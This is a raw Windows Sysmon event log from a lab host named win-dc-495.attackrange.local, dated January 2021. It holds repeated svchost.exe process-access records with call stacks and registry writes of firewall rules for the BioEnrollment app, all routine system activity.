13:58:21.133{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:21.117{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-3845273463-1331427702-1186551195-1148109977|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|M=microsoft.bioenrollment_cw5n1h2txyewy|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\|PFN=Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy| 13241300x800000000000000010458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.102{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{51DA62D0-837B-4B0E-B7AC-5C186E2A316C}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 
13241300x800000000000000010457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.102{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B6554203-81C7-4341-9319-DDF5B1E861C3}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 10341000x800000000000000010456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.071{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 